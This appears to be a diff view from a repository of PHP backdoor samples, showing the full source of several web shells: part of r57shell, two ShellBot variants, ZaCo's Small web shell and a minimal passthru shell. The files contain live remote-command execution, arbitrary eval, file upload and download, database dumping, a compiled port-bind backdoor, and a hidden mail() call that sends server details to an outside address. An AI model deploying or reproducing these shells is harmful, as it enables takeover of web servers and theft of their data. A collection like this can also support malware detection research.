<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>
<?
/* change dir */
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
/* display information */
echo "<font face=Verdana size=-2>";
echo "<font color=blue><b>uname -a :&nbsp;<br>id :&nbsp;<br>pwd :&nbsp;</b></font><br>";
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo "&nbsp;&nbsp;&nbsp; ".exec("uname -a")."<br>";
echo "&nbsp;&nbsp;&nbsp; ".exec("id")."<br>";
echo "&nbsp;&nbsp;&nbsp; ".exec("pwd")."";
echo "</b></font>";
echo "</font>";
?>
</td></tr></table>
<?
/* port bind */
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
{
$w_file=fopen("/tmp/bd.c","ab+") or exit();
fputs($w_file,$port_bind_bd_c);
fclose($w_file);
$_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd";
}
?>
<?
/* alias execute */
if (($_POST['alias']) AND ($_POST['alias']!==""))
{
foreach ($aliases as $alias_name=>$alias_cmd) {
if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
}
}
?>
<?
/* file upload */
if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"]))
{
copy($HTTP_POST_FILES["userfile"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["userfile"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>");
}
?>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<?
/* command execute */
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; }
echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
echo "<b>";
echo "<div align=center><textarea name=report cols=122 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr>
<tr><td height=23>
<?
/* command execute form */
echo "<form name=command method=post>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>";
echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
echo "&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* file upload form */
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=file name=userfile size=85>&nbsp;";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* aliases form */
echo "<form name=aliases method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<select name=alias>";
foreach ($aliases as $alias_name=>$alias_cmd)
{
echo "<option>$alias_name</option>";
}
echo "</select>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* port bind form */
echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=port size=15 value=11457>&nbsp;";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=hidden name=bind size=1 value=bd.c>";
echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt3]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<?
echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version 1.0 beta ]---o</b></font></div>";
?>
</td></tr></table>
<!-- don't delete this plz -->
<script language="javascript">
hotlog_js="1.0";
hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+
escape(window.location.href);
document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");
</script><script language="javascript1.1">
hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script>
<script language="javascript1.2">
hotlog_js="1.2";
hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+
(((navigator.appName.substring(0,3)=="Mic"))?
screen.colorDepth:screen.pixelDepth)</script>
<script language="javascript1.3">hotlog_js="1.3"</script>
<script language="javascript">hotlog_r+="&js="+hotlog_js;
document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+
" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+
hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script>
<noscript><a href=http://click.hotlog.ru/?81606 target=_top><img
src="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0
width="1" height="1" alt="HotLog"></a></noscript>
<!-- /don't delete this plz -->
<? /* -------------------------[ EOF ]------------------------- */ ?>

28
PHP/Backdoor.PHP.Rst.ap Normal file
View File

File diff suppressed because one or more lines are too long

1873
PHP/Backdoor.PHP.Rst.e Normal file
View File

File diff suppressed because it is too large Load Diff

1874
PHP/Backdoor.PHP.Rst.f Normal file
View File

File diff suppressed because it is too large Load Diff

2209
PHP/Backdoor.PHP.Rst.g Normal file
View File

File diff suppressed because it is too large Load Diff

2121
PHP/Backdoor.PHP.Rst.i Normal file
View File

File diff suppressed because it is too large Load Diff

2220
PHP/Backdoor.PHP.Rst.k Normal file
View File

File diff suppressed because it is too large Load Diff

2131
PHP/Backdoor.PHP.Rst.s Normal file
View File

File diff suppressed because it is too large Load Diff

76
PHP/Backdoor.PHP.ShellBot.e Normal file
View File

@ -0,0 +1,76 @@
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = $_SERVER['SERVER_ADDR'];
$alb9 = get_current_user();
$os = @PHP_OS;
echo "UNITED #D-Devils By The King Sir|ToTTi<br>";
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "SoftWare: $alb5<br>";
echo "user: $alb9<br>";
echo "PHPV: $alb6<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
$free = disk_free_space($dir);
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
echo "TotalSpace".view_size($all)."</b>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
?>

75
PHP/Backdoor.PHP.ShellBot.f Normal file
View File

@ -0,0 +1,75 @@
?>
<?
$dir = @getcwd();
$ker = @php_uname();
echo "By Blu3H4".(5+2);
$OS = @PHP_OS;
$IpServer = $_SERVER["SERVER_ADDR"];
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = "$SafeMode"; }
echo "<br> blu3start Server_IP: {$IpServer} __ System:{$OS} __ Uname: {$UNAME} __ PHP: {$PHPv} __ safe mode: {$SafeMode} blu3end";
echo "Blu3H47<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
?>

501
PHP/Backdoor.PHP.Small.h Normal file
View File

@ -0,0 +1,501 @@
<?
##########################################################
# Small PHP Web Shell by ZaCo (c) 2004-2006 #
# +POST method #
# +MySQL Client+Dumper for DB and tables #
# +PHP eval in text format and html for phpinfo() example #
# PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther #
# For antichat.ru and cup.su friends usage #
# All bugs -> mailo:zaco@yandex.ru #
# Just for fun :) #
##########################################################
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if(get_magic_quotes_gpc())
{
$s=str_replace('\\\'','\'',$s);
$s=str_replace('\\\\','\\',$s);
$s=str_replace('\\"','"',$s);
$s=str_replace('\\\0','\0',$s);
}
return $s;
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
function get_perms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
$head=<<<headka
<html>
<head>
<title>Small Web Shell by ZaCo</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else
{
echo($head.$pages);
?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?
}
break;
}
case 'cmd':
{
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
}
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head.$pages);
?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;$i<sizeof($files);$i++)
{
$fn=$files[$i];
if(is_dir($fn))
{
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
$f=@fopen($work_dir,'r');
?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?
break;
}
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
if(!$result2)$dump_file.='#error table '.$rows[0];
else
{
$dump_file.='create table `'.$rows[0]."`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$rows[0].'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
}
}
mysql_free_result($result);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo($dump_file);
}
else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
else
{
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
if(!$result2)echo('error table '.$table_dump);
else
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
if($to_file===false)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$dump_file.="create table `{$table_dump}`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$table_dump.'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo $dump_file;
}else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
}
}
}
break;
}
case 'query' :
{
echo($head.$pages);
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
echo("<table valign=top align=left>\n<tr>");
for($i=0;$i<mysql_num_fields($result);$i++)
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
echo("\n</tr>\n");
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
echo('<tr valign=top align=left>');
for($j=0;$j<mysql_num_fields($result);$j++)
{
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
}
echo("</tr>\n");
}
echo("</table>\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
?>

35
PHP/Backdoor.PHP.Small.j Normal file
View File

@ -0,0 +1,35 @@
<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
